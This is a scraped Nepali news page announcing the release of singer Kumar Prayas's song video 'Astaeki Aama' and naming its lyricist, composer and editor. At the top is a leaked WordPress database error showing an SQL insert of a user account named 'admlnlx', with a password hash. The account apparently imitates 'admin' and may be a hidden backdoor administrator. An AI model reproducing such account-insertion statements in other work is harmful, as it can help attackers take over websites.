WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0A93FHj1pwHKD9DAlR01vLymrZ7fY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:16:14', '', 'admlnlx', 'admlnlx')

कुमार प्रयासको अस्ताएकी आमाको भिडियो सार्वजनिक – Gaule Khabar

कुमार प्रयासको अस्ताएकी आमाको भिडियो सार्वजनिक

कुमार प्रयासको अस्ताएकी आमाको भिडियो सार्वजनिक

काठमाण्डौ । कुमार प्रयासकाे ‘अस्ताएकी आमा’ बोलको गीत सार्वजनिक भएको छ । गीत गायक प्रयासले आफ्नै आमाकाे सम्झनामा गाएका हुन् ।

“अस्ताएकी आमा” शब्द  सुवास सङ्गमको रहेको छ ।  संगीत विक्रम राईले गरेका छन् भने संगीत संयोजन देबेश राईको रहेको छ ।

गाउँले ईन्टरटेनटमेनको पोस्ट प्रोडक्सनमा निर्मित “अस्ताएकी आमा”को भिडियोमा छयाङ्कन र सम्पादन गङ्गाराम राईको रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका